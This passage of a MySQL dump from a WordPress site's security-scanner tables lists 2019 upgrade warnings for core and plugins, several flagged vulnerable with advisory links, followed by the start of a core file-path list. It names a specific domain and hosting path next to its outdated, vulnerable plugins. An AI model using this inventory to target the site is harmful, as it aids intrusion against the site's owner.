Manager</a>\";s:10:\"AuthorName\";s:12:\"mndpsingh287\";s:10:\"pluginFile\";s:99:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/wp-file-manager/file_folder_manager.php\";s:10:\"newVersion\";s:3:\"5.4\";s:4:\"slug\";s:15:\"wp-file-manager\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/wp-file-manager\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:41:\"https://wpvulndb.com/vulnerabilities/9446\";}'),(4456,1571971176,1571971176,'new','wfPluginUpgrade',50,'5292567a12c67d10a468dd4e852ad38b','5292567a12c67d10a468dd4e852ad38b','The Plugin \"WP Cerber Security, Antispam &amp; Malware Scan\" needs an upgrade (8.4 -> 8.5).','You need to upgrade \"WP Cerber Security, Antispam &amp; Malware Scan\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:47:\"WP Cerber Security, Antispam &amp; Malware Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:3:\"8.4\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:5:\"Title\";s:82:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Antispam &amp; Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:10:\"pluginFile\";s:83:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/wp-cerber/wp-cerber.php\";s:10:\"newVersion\";s:3:\"8.5\";s:4:\"slug\";s:9:\"wp-cerber\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wp-cerber\";s:10:\"vulnerable\";b:0;}'),(4454,1571971176,1571971176,'new','wfPluginUpgrade',50,'e788f708008d1397b23e269c54b11a74','e788f708008d1397b23e269c54b11a74','The Plugin \"Swift Performance Lite\" needs an upgrade (2.1 -> 2.1.1).','You need to upgrade \"Swift Performance Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:22:\"Swift Performance Lite\";s:9:\"PluginURI\";s:27:\"https://swiftperformance.io\";s:7:\"Version\";s:3:\"2.1\";s:11:\"Description\";s:85:\"Boost your WordPress site <cite>By <a href=\"https://swteplugins.com\">SWTE</a>.</cite>\";s:6:\"Author\";s:42:\"<a href=\"https://swteplugins.com\">SWTE</a>\";s:9:\"AuthorURI\";s:23:\"https://swteplugins.com\";s:10:\"TextDomain\";s:17:\"swift-performance\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:64:\"<a href=\"https://swiftperformance.io\">Swift Performance Lite</a>\";s:10:\"AuthorName\";s:4:\"SWTE\";s:10:\"pluginFile\";s:98:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/swift-performance-lite/performance.php\";s:10:\"newVersion\";s:5:\"2.1.1\";s:4:\"slug\";s:22:\"swift-performance-lite\";s:5:\"wpURL\";s:52:\"https://wordpress.org/plugins/swift-performance-lite\";s:10:\"vulnerable\";b:0;}'),(4455,1571971176,1571971176,'new','wfPluginUpgrade',50,'e003444627d413f02d2f20b9b44ea2f9','e003444627d413f02d2f20b9b44ea2f9','The Plugin \"UpdraftPlus - Backup/Restore\" needs an upgrade (1.16.12 -> 1.16.17).','You need to upgrade \"UpdraftPlus - Backup/Restore\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:28:\"UpdraftPlus - Backup/Restore\";s:9:\"PluginURI\";s:23:\"https://updraftplus.com\";s:7:\"Version\";s:7:\"1.16.12\";s:11:\"Description\";s:237:\"Backup and restore: take backups locally, or backup to Amazon S3, Dropbox, Google Drive, Rackspace, (S)FTP, WebDAV &amp; email, on automatic schedules. <cite>By <a href=\"https://updraftplus.com\">UpdraftPlus.Com, DavidAnderson</a>.</cite>\";s:6:\"Author\";s:68:\"<a href=\"https://updraftplus.com\">UpdraftPlus.Com, DavidAnderson</a>\";s:9:\"AuthorURI\";s:23:\"https://updraftplus.com\";s:10:\"TextDomain\";s:11:\"updraftplus\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:66:\"<a href=\"https://updraftplus.com\">UpdraftPlus - Backup/Restore</a>\";s:10:\"AuthorName\";s:30:\"UpdraftPlus.Com, DavidAnderson\";s:10:\"pluginFile\";s:87:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/updraftplus/updraftplus.php\";s:10:\"newVersion\";s:7:\"1.16.17\";s:4:\"slug\";s:11:\"updraftplus\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/updraftplus\";s:10:\"vulnerable\";b:0;}'),(4449,1571971176,1571971176,'new','wfPluginUpgrade',50,'64695597500910ab2b499236ba7a7164','64695597500910ab2b499236ba7a7164','The Plugin \"Elementor\" needs an upgrade (2.5.14 -> 2.7.4).','You need to upgrade \"Elementor\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:9:\"Elementor\";s:9:\"PluginURI\";s:97:\"https://elementor.com/?utm_source=wp-plugins&#038;utm_campaign=plugin-uri&#038;utm_medium=wp-dash\";s:7:\"Version\";s:6:\"2.5.14\";s:11:\"Description\";s:290:\"The most advanced frontend drag &amp; drop page builder. Create high-end, pixel perfect websites at record speeds. Any theme, any page, any design. <cite>By <a href=\"https://elementor.com/?utm_source=wp-plugins&#038;utm_campaign=author-uri&#038;utm_medium=wp-dash\">Elementor.com</a>.</cite>\";s:6:\"Author\";s:125:\"<a href=\"https://elementor.com/?utm_source=wp-plugins&#038;utm_campaign=author-uri&#038;utm_medium=wp-dash\">Elementor.com</a>\";s:9:\"AuthorURI\";s:97:\"https://elementor.com/?utm_source=wp-plugins&#038;utm_campaign=author-uri&#038;utm_medium=wp-dash\";s:10:\"TextDomain\";s:9:\"elementor\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:121:\"<a href=\"https://elementor.com/?utm_source=wp-plugins&#038;utm_campaign=plugin-uri&#038;utm_medium=wp-dash\">Elementor</a>\";s:10:\"AuthorName\";s:13:\"Elementor.com\";s:10:\"pluginFile\";s:83:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/elementor/elementor.php\";s:10:\"newVersion\";s:5:\"2.7.4\";s:4:\"slug\";s:9:\"elementor\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/elementor\";s:10:\"vulnerable\";b:0;}'),(4450,1571971176,1571971176,'new','wfPluginUpgrade',50,'6c77a846e0e081ebcfac491aab37164e','6c77a846e0e081ebcfac491aab37164e','The Plugin \"Hello Dolly\" needs an upgrade (1.7.1 -> 1.7.2).','You need to upgrade \"Hello Dolly\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:11:\"Hello Dolly\";s:9:\"PluginURI\";s:41:\"http://wordpress.org/plugins/hello-dolly/\";s:7:\"Version\";s:5:\"1.7.1\";s:11:\"Description\";s:342:\"This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from Hello, Dolly in the upper right of your admin screen on every page. <cite>By <a href=\"http://ma.tt/\">Matt Mullenweg</a>.</cite>\";s:6:\"Author\";s:42:\"<a href=\"http://ma.tt/\">Matt Mullenweg</a>\";s:9:\"AuthorURI\";s:13:\"http://ma.tt/\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:67:\"<a href=\"http://wordpress.org/plugins/hello-dolly/\">Hello Dolly</a>\";s:10:\"AuthorName\";s:14:\"Matt Mullenweg\";s:10:\"pluginFile\";s:69:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/hello.php\";s:10:\"newVersion\";s:5:\"1.7.2\";s:4:\"slug\";s:11:\"hello-dolly\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/hello-dolly\";s:10:\"vulnerable\";b:0;}'),(4451,1571971176,1571971176,'new','wfPluginUpgrade',50,'a5ca84d3e9a7c31338d30848bac517ad','a5ca84d3e9a7c31338d30848bac517ad','The Plugin \"Jetpack by WordPress.com\" needs an upgrade (7.7.1 -> 7.8).','You need to upgrade \"Jetpack by WordPress.com\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:19:\"https://jetpack.com\";s:7:\"Version\";s:5:\"7.7.1\";s:11:\"Description\";s:280:\"Bring the power of the WordPress.com cloud to your self-hosted WordPress. Jetpack enables you to connect your blog to a WordPress.com account to use the powerful features normally only available to WordPress.com users. <cite>By <a href=\"https://jetpack.com\">Automattic</a>.</cite>\";s:6:\"Author\";s:44:\"<a href=\"https://jetpack.com\">Automattic</a>\";s:9:\"AuthorURI\";s:19:\"https://jetpack.com\";s:10:\"TextDomain\";s:7:\"jetpack\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:5:\"Title\";s:58:\"<a href=\"https://jetpack.com\">Jetpack by WordPress.com</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:79:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/jetpack/jetpack.php\";s:10:\"newVersion\";s:3:\"7.8\";s:4:\"slug\";s:7:\"jetpack\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/jetpack\";s:10:\"vulnerable\";b:0;}'),(4452,1571971176,1571971176,'new','wfPluginUpgrade',50,'77ae6095b6c31ec1832334500afda42c','77ae6095b6c31ec1832334500afda42c','The Plugin \"MaxButtons\" needs an upgrade (7.9 -> 7.13.1).','You need to upgrade \"MaxButtons\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:10:\"MaxButtons\";s:9:\"PluginURI\";s:21:\"http://maxbuttons.com\";s:7:\"Version\";s:3:\"7.9\";s:11:\"Description\";s:210:\"The best WordPress button generator. This is the free version; the Pro version <a href=\"http://maxbuttons.com/?ref=mbfree\">can be found here</a>. <cite>By <a href=\"http://maxfoundry.com\">Max Foundry</a>.</cite>\";s:6:\"Author\";s:47:\"<a href=\"http://maxfoundry.com\">Max Foundry</a>\";s:9:\"AuthorURI\";s:21:\"http://maxfoundry.com\";s:10:\"TextDomain\";s:10:\"maxbuttons\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:46:\"<a href=\"http://maxbuttons.com\">MaxButtons</a>\";s:10:\"AuthorName\";s:11:\"Max Foundry\";s:10:\"pluginFile\";s:85:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/maxbuttons/maxbuttons.php\";s:10:\"newVersion\";s:6:\"7.13.1\";s:4:\"slug\";s:10:\"maxbuttons\";s:5:\"wpURL\";s:40:\"https://wordpress.org/plugins/maxbuttons\";s:10:\"vulnerable\";b:0;}'),(4448,1571971176,1571971176,'new','wfPluginUpgrade',50,'6080b9f29319eebf06785f1ebeb2426d','6080b9f29319eebf06785f1ebeb2426d','The Plugin \"Disable Comments\" needs an upgrade (1.9.0 -> 1.10.2).','You need to upgrade \"Disable Comments\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:16:\"Disable Comments\";s:9:\"PluginURI\";s:47:\"https://wordpress.org/plugins/disable-comments/\";s:7:\"Version\";s:5:\"1.9.0\";s:11:\"Description\";s:185:\"Allows administrators to globally disable comments on their site. Comments can be disabled according to post type. <cite>By <a href=\"http://www.rayofsolaris.net/\">Samir Shah</a>.</cite>\";s:6:\"Author\";s:53:\"<a href=\"http://www.rayofsolaris.net/\">Samir Shah</a>\";s:9:\"AuthorURI\";s:28:\"http://www.rayofsolaris.net/\";s:10:\"TextDomain\";s:16:\"disable-comments\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:5:\"Title\";s:78:\"<a href=\"https://wordpress.org/plugins/disable-comments/\">Disable Comments</a>\";s:10:\"AuthorName\";s:10:\"Samir Shah\";s:10:\"pluginFile\";s:97:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/disable-comments/disable-comments.php\";s:10:\"newVersion\";s:6:\"1.10.2\";s:4:\"slug\";s:16:\"disable-comments\";s:5:\"wpURL\";s:46:\"https://wordpress.org/plugins/disable-comments\";s:10:\"vulnerable\";b:0;}'),(4447,1571971176,1571971176,'new','wfPluginUpgrade',50,'efd24ee4c4233b597957cd270a0c279e','efd24ee4c4233b597957cd270a0c279e','The Plugin \"Classic Editor\" needs an upgrade (1.4 -> 1.5).','You need to upgrade \"Classic Editor\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:14:\"Classic Editor\";s:9:\"PluginURI\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"Version\";s:3:\"1.4\";s:11:\"Description\";s:253:\"Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen. <cite>By <a href=\"https://github.com/WordPress/classic-editor/\">WordPress Contributors</a>.</cite>\";s:6:\"Author\";s:81:\"<a href=\"https://github.com/WordPress/classic-editor/\">WordPress Contributors</a>\";s:9:\"AuthorURI\";s:44:\"https://github.com/WordPress/classic-editor/\";s:10:\"TextDomain\";s:14:\"classic-editor\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:74:\"<a href=\"https://wordpress.org/plugins/classic-editor/\">Classic Editor</a>\";s:10:\"AuthorName\";s:22:\"WordPress Contributors\";s:10:\"pluginFile\";s:93:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/classic-editor/classic-editor.php\";s:10:\"newVersion\";s:3:\"1.5\";s:4:\"slug\";s:14:\"classic-editor\";s:5:\"wpURL\";s:44:\"https://wordpress.org/plugins/classic-editor\";s:10:\"vulnerable\";b:0;}'),(4446,1571971176,1571971176,'new','wfPluginUpgrade',50,'eb1bda56645ff92f8059909fac8858bc','eb1bda56645ff92f8059909fac8858bc','The Plugin \"Black Studio TinyMCE Widget\" needs an upgrade (2.6.8 -> 2.6.9).','You need to upgrade \"Black Studio TinyMCE Widget\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:27:\"Black Studio TinyMCE Widget\";s:9:\"PluginURI\";s:58:\"https://wordpress.org/plugins/black-studio-tinymce-widget/\";s:7:\"Version\";s:5:\"2.6.8\";s:11:\"Description\";s:167:\"Adds a new &#8220;Visual Editor&#8221; widget type based on the native WordPress TinyMCE editor. <cite>By <a href=\"https://www.blackstudio.it\">Black Studio</a>.</cite>\";s:6:\"Author\";s:53:\"<a href=\"https://www.blackstudio.it\">Black Studio</a>\";s:9:\"AuthorURI\";s:26:\"https://www.blackstudio.it\";s:10:\"TextDomain\";s:27:\"black-studio-tinymce-widget\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:100:\"<a href=\"https://wordpress.org/plugins/black-studio-tinymce-widget/\">Black Studio TinyMCE Widget</a>\";s:10:\"AuthorName\";s:12:\"Black Studio\";s:10:\"pluginFile\";s:119:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/black-studio-tinymce-widget/black-studio-tinymce-widget.php\";s:10:\"newVersion\";s:5:\"2.6.9\";s:4:\"slug\";s:27:\"black-studio-tinymce-widget\";s:5:\"wpURL\";s:57:\"https://wordpress.org/plugins/black-studio-tinymce-widget\";s:10:\"vulnerable\";b:0;}'),(4445,1571971176,1571971176,'new','wfPluginUpgrade',100,'e58774359b4d5aad5fb40c4c6ff0d10c','e58774359b4d5aad5fb40c4c6ff0d10c','The Plugin \"All In One WP Security\" needs an upgrade (4.4.0 -> 4.4.2).','You need to upgrade \"All In One WP Security\" to the newest version to ensure you have any security fixes the developer has released.','a:17:{s:4:\"Name\";s:22:\"All In One WP Security\";s:9:\"PluginURI\";s:71:\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\";s:7:\"Version\";s:5:\"4.4.0\";s:11:\"Description\";s:153:\"All round best WordPress security plugin! <cite>By <a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>.</cite>\";s:6:\"Author\";s:94:\"<a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>\";s:9:\"AuthorURI\";s:33:\"https://www.tipsandtricks-hq.com/\";s:10:\"TextDomain\";s:35:\"all-in-one-wp-security-and-firewall\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:5:\"Title\";s:108:\"<a href=\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\">All In One WP Security</a>\";s:10:\"AuthorName\";s:46:\"Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy\";s:10:\"pluginFile\";s:111:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php\";s:10:\"newVersion\";s:5:\"4.4.2\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"wpURL\";s:65:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:41:\"https://wpvulndb.com/vulnerabilities/9898\";}'),(4444,1571971176,1571971176,'new','wfPluginUpgrade',100,'4df3a7a787ffce3e80241bc9205551e1','4df3a7a787ffce3e80241bc9205551e1','The Plugin \"All In One SEO Pack\" needs an upgrade (2.12 -> 3.2.10).','You need to upgrade \"All In One SEO Pack\" to the newest version to ensure you have any security fixes the developer has released.','a:17:{s:4:\"Name\";s:19:\"All In One SEO Pack\";s:9:\"PluginURI\";s:58:\"https://semperplugins.com/all-in-one-seo-pack-pro-version/\";s:7:\"Version\";s:4:\"2.12\";s:11:\"Description\";s:320:\"Out-of-the-box SEO for your WordPress blog. Features like XML Sitemaps, SEO for custom post types, SEO for blogs or business sites, SEO for ecommerce sites, and much more. More than 50 million downloads since 2007. <cite>By <a href=\"https://semperplugins.com/all-in-one-seo-pack-pro-version/\">Michael Torbert</a>.</cite>\";s:6:\"Author\";s:88:\"<a href=\"https://semperplugins.com/all-in-one-seo-pack-pro-version/\">Michael Torbert</a>\";s:9:\"AuthorURI\";s:58:\"https://semperplugins.com/all-in-one-seo-pack-pro-version/\";s:10:\"TextDomain\";s:19:\"all-in-one-seo-pack\";s:10:\"DomainPath\";s:6:\"/i18n/\";s:7:\"Network\";b:0;s:5:\"Title\";s:92:\"<a href=\"https://semperplugins.com/all-in-one-seo-pack-pro-version/\">All In One SEO Pack</a>\";s:10:\"AuthorName\";s:15:\"Michael Torbert\";s:10:\"pluginFile\";s:103:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/all-in-one-seo-pack/all_in_one_seo_pack.php\";s:10:\"newVersion\";s:6:\"3.2.10\";s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:5:\"wpURL\";s:49:\"https://wordpress.org/plugins/all-in-one-seo-pack\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:41:\"https://wpvulndb.com/vulnerabilities/9915\";}'),(4441,1571971176,1571971176,'new','wfUpgrade',75,'51832d138379af28de2d44a15f388d89','51832d138379af28de2d44a15f388d89','Your WordPress version is out of date','WordPress version 5.2.4 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.1.3\";s:10:\"newVersion\";s:5:\"5.2.4\";}'),(4442,1571971176,1571971176,'new','wfPluginUpgrade',50,'5c3b016b1d867aa124f705928dedf81a','5c3b016b1d867aa124f705928dedf81a','The Plugin \"Akismet Anti-Spam\" needs an upgrade (4.1.1 -> 4.1.2).','You need to upgrade \"Akismet Anti-Spam\" to the newest version to ensure you have any security fixes the developer has released.','a:16:{s:4:\"Name\";s:17:\"Akismet Anti-Spam\";s:9:\"PluginURI\";s:20:\"https://akismet.com/\";s:7:\"Version\";s:5:\"4.1.1\";s:11:\"Description\";s:363:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. <cite>By <a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>.</cite>\";s:6:\"Author\";s:66:\"<a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>\";s:9:\"AuthorURI\";s:41:\"https://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:7:\"akismet\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:52:\"<a href=\"https://akismet.com/\">Akismet Anti-Spam</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:79:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/akismet/akismet.php\";s:10:\"newVersion\";s:5:\"4.1.2\";s:4:\"slug\";s:7:\"akismet\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/akismet\";s:10:\"vulnerable\";b:0;}'),(4443,1571971176,1571971176,'new','wfPluginUpgrade',100,'7bc03410ca349a6412e3d2961bb4d17f','7bc03410ca349a6412e3d2961bb4d17f','The Plugin \"All-in-One WP Migration\" needs an upgrade (6.92 -> 7.8).','You need to upgrade \"All-in-One WP Migration\" to the newest version to ensure you have any security fixes the developer has released.','a:17:{s:4:\"Name\";s:23:\"All-in-One WP Migration\";s:9:\"PluginURI\";s:21:\"https://servmask.com/\";s:7:\"Version\";s:4:\"6.92\";s:11:\"Description\";s:156:\"Migration tool for all your blog data. Import or Export your blog content with a single click. <cite>By <a href=\"https://servmask.com/\">ServMask</a>.</cite>\";s:6:\"Author\";s:44:\"<a href=\"https://servmask.com/\">ServMask</a>\";s:9:\"AuthorURI\";s:21:\"https://servmask.com/\";s:10:\"TextDomain\";s:23:\"all-in-one-wp-migration\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:5:\"Title\";s:59:\"<a href=\"https://servmask.com/\">All-in-One WP Migration</a>\";s:10:\"AuthorName\";s:8:\"ServMask\";s:10:\"pluginFile\";s:111:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/all-in-one-wp-migration/all-in-one-wp-migration.php\";s:10:\"newVersion\";s:3:\"7.8\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:5:\"wpURL\";s:53:\"https://wordpress.org/plugins/all-in-one-wp-migration\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:41:\"https://wpvulndb.com/vulnerabilities/9461\";}');
/*!40000 ALTER TABLE `wpdp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wpdp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=24858 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfknownfilelist`
--

LOCK TABLES `wpdp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wpdp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wpdp_wfknownfilelist` (`id`, `path`) VALUES (1,'adminer.php'),(2,'googled517ac07ced695b8.html'),(3,'index.php'),(4,'license.txt'),(5,'readme.html'),(6,'wp-activate.php'),(7,'wp-admin/about.php'),(8,'wp-admin/admin-ajax.php'),(9,'wp-admin/admin-footer.php'),(10,'wp-admin/admin-functions.php'),(11,'wp-admin/admin-header.php'),(12,'wp-admin/admin-post.php'),(13,'wp-admin/admin.php'),(14,'wp-admin/async-upload.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/about-rtl.css'),(18,'wp-admin/css/about-rtl.min.css'),(19,'wp-admin/css/about.css'),(20,'wp-admin/css/about.min.css'),(21,'wp-admin/css/admin-menu-rtl.css'),(22,'wp-admin/css/admin-menu-rtl.min.css'),(23,'wp-admin/css/admin-menu.css'),(24,'wp-admin/css/admin-menu.min.css'),(25,'wp-admin/css/code-editor-rtl.css'),(26,'wp-admin/css/code-editor-rtl.min.css'),(27,'wp-admin/css/code-editor.css'),(28,'wp-admin/css/code-editor.min.css'),(29,'wp-admin/css/color-picker-rtl.css'),(30,'wp-admin/css/color-picker-rtl.min.css'),(31,'wp-admin/css/color-picker.css'),(32,'wp-admin/css/color-picker.min.css'),(33,'wp-admin/css/colors/_admin.scss'),(34,'wp-admin/css/colors/_mixins.scss'),(35,'wp-admin/css/colors/_variables.scss'),(36,'wp-admin/css/colors/blue/colors-rtl.css'),(37,'wp-admin/css/colors/blue/colors-rtl.min.css'),(38,'wp-admin/css/colors/blue/colors.css'),(39,'wp-admin/css/colors/blue/colors.min.css'),(40,'wp-admin/css/colors/blue/colors.scss'),(41,'wp-admin/css/colors/coffee/colors-rtl.css'),(42,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(43,'wp-admin/css/colors/coffee/colors.css'),(44,'wp-admin/css/colors/coffee/colors.min.css'),(45,'wp-admin/css/colors/coffee/colors.scss'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(48,'wp-admin/css/colors/ectoplasm/colors.css'),(49,'wp-admin/css/colors/ectoplasm/colors.min.css'),(50,'wp-admin/css/colors/ectoplasm/colors.scss'),(51,'wp-admin/css/colors/light/colors-rtl.css'),(52,'wp-admin/css/colors/light/colors-rtl.min.css'),(53,'wp-admin/css/colors/light/colors.css'),(54,'wp-admin/css/colors/light/colors.min.css'),(55,'wp-admin/css/colors/light/colors.scss'),(56,'wp-admin/css/colors/midnight/colors-rtl.css'),(57,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(58,'wp-admin/css/colors/midnight/colors.css'),(59,'wp-admin/css/colors/midnight/colors.min.css'),(60,'wp-admin/css/colors/midnight/colors.scss'),(61,'wp-admin/css/colors/ocean/colors-rtl.css'),(62,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(63,'wp-admin/css/colors/ocean/colors.css'),(64,'wp-admin/css/colors/ocean/colors.min.css'),(65,'wp-admin/css/colors/ocean/colors.scss'),(66,'wp-admin/css/colors/sunrise/colors-rtl.css'),(67,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(68,'wp-admin/css/colors/sunrise/colors.css'),(69,'wp-admin/css/colors/sunrise/colors.min.css'),(70,'wp-admin/css/colors/sunrise/colors.scss'),(71,'wp-admin/css/common-rtl.css'),(72,'wp-admin/css/common-rtl.min.css'),(73,'wp-admin/css/common.css'),(74,'wp-admin/css/common.min.css'),(75,'wp-admin/css/customize-controls-rtl.css'),(76,'wp-admin/css/customize-controls-rtl.min.css'),(77,'wp-admin/css/customize-controls.css'),(78,'wp-admin/css/customize-controls.min.css'),(79,'wp-admin/css/customize-nav-menus-rtl.css'),(80,'wp-admin/css/customize-nav-menus-rtl.min.css'),(81,'wp-admin/css/customize-nav-menus.css'),(82,'wp-admin/css/customize-nav-menus.min.css'),(83,'wp-admin/css/customize-widgets-rtl.css'),(84,'wp-admin/css/customize-widgets-rtl.min.css'),(85,'wp-admin/css/customize-widgets.css'),(86,'wp-admin/css/customize-widgets.min.css'),(87,'wp-admin/css/dashboard-rtl.css'),(88,'wp-admin/css/dashboard-rtl.min.css'),(89,'wp-admin/css/dashboard.css'),(90,'wp-admin/css/dashboard.min.css'),(91,'wp-admin/css/deprecated-media-rtl.css'),(92,'wp-admin/css/deprecated-media-rtl.min.css'),(93,'wp-admin/css/deprecated-media.css'),(94,'wp-admin/css/deprecated-media.min.css'),(95,'wp-admin/css/edit-rtl.css'),(96,'wp-admin/css/edit-rtl.min.css'),(97,'wp-admin/css/edit.css'),(98,'wp-admin/css/edit.min.css'),(99,'wp-admin/css/farbtastic-rtl.css'),(100,'wp-admin/css/farbtastic-rtl.min.css'),(101,'wp-admin/css/farbtastic.css'),(102,'wp-admin/css/farbtastic.min.css'),(103,'wp-admin/css/forms-rtl.css'),(104,'wp-admin/css/forms-rtl.min.css'),(105,'wp-admin/css/forms.css'),(106,'wp-admin/css/forms.min.css'),(107,'wp-admin/css/ie-rtl.css'),(108,'wp-admin/css/ie-rtl.min.css'),(109,'wp-admin/css/ie.css'),(110,'wp-admin/css/ie.min.css'),(111,'wp-admin/css/install-rtl.css'),(112,'wp-admin/css/install-rtl.min.css'),(113,'wp-admin/css/install.css'),(114,'wp-admin/css/install.min.css'),(115,'wp-admin/css/l10n-rtl.css'),(116,'wp-admin/css/l10n-rtl.min.css'),(117,'wp-admin/css/l10n.css'),(118,'wp-admin/css/l10n.min.css'),(119,'wp-admin/css/list-tables-rtl.css'),(120,'wp-admin/css/list-tables-rtl.min.css'),(121,'wp-admin/css/list-tables.css'),(122,'wp-admin/css/list-tables.min.css'),(123,'wp-admin/css/login-rtl.css'),(124,'wp-admin/css/login-rtl.mi